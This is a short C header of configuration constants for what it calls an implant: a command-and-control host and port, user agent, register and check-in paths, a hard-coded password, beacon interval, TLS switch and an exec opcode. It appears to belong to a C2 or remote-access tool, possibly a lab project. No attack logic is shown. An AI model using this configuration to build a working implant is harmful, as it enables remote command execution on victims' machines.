
#define C2_HOST L"localhost"
#define C2_PORT 5000
#define C2_UA L"speedrun"

#define REGISTER_PATH L"/register"
#define CHECKIN_PATH L"/checkin"
#define PASSWORD "12345"

// how often the implant sleeps before checking in
#define BEACON_SLEEP 1000
#define USE_TLS FALSE

// OPCODES
//
#define OPCODE_EXEC 1
